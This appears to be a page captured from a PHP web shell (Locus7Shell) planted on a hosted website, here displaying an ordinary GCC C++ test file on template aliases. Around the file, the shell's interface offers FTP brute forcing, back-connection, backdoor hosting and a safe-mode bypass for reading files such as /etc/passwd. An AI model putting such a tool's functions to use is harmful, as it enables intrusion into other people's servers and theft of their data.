Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/g++.dg/cpp0x/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     alias-decl-46.C (2.63 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
// PR c++/62134
// { dg-do compile { target c++11 } }

template<typename... T> struct tuple;
template<__SIZE_TYPE__, typename U> struct tuple_element;

template<bool, typename T = void> struct enable_if  { };
template<typename T> struct enable_if<true, T> { typedef T type; };

template <int V> struct int_t { static constexpr int value = V; };
template <int V> int constexpr int_t<V>::value;

template <class A, class Val, int i=0>
struct Index
{
    static int const value = -1;
};

template <class ... A, class Val, int i>
struct Index<tuple<Val, A ...>, Val, i>
{
    static int const value = i;
};

template <class A0, class ... A, class Val, int i>
struct Index<tuple<A0, A ...>, Val, i>
{
    static int const value = Index<tuple<A ...>, Val, i+1>::value;
};

template <class C, class R> struct PermutationSign;

template <int w, class C, class R>
struct PermutationSignIfFound
{
    static int const value = 0;
};

template <class C, class R>
struct PermutationSignIfFound<-1, C, R>
{
    static int const value = 0;
};

template <>
struct PermutationSign<tuple<>, tuple<>>
{
    static int const value = 1;
};

template <class C>
struct PermutationSign<C, tuple<>>
{
    static int const value = 0;
};

template <class R>
struct PermutationSign<tuple<>, R>
{
    static int const value = 0;
};

template <class C, class Org>
struct PermutationSign
{
    static int const value
    = PermutationSignIfFound
      <Index<C, typename tuple_element<0, Org>::type>::value,
       C, Org>::value;
};

template <class A, template <class> class Pred, int i=0, class Enable=void>
struct IndexIf
{
    static int const value = -1;
    using type = tuple<>;
};

template <class A0, class ... A, template <class> class Pred, int i>
struct IndexIf<tuple<A0, A ...>, Pred, i,
           typename enable_if<Pred<A0>::value>::type>
{
    using type = A0;
    static int const value = i;
};

template <class A0, class ... A, template <class> class Pred, int i>
struct IndexIf<tuple<A0, A ...>, Pred, i,
           typename enable_if<!Pred<A0>::value>::type>
{
    using next = IndexIf<tuple<A ...>, Pred, i+1>;
    using type = typename next::type;
    static int const value = next::value;
};

template <class P>
struct MatchPermutationP
{
    template <class A> using type = PermutationSign<P, A>;
};

template <class P, class Plist> struct FindCombination
{
    using type = IndexIf<Plist, MatchPermutationP<P>::template type>;
    static int const where = type::value;
    static int const sign
    = (where>=0) ? PermutationSign<P, typename type::type>::value : 0;
};

int main()
{
  using finder = FindCombination<tuple<>, tuple<tuple<>>>;
  static_assert(finder::where==0 && finder::sign==+1, "bad");
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0051 ]--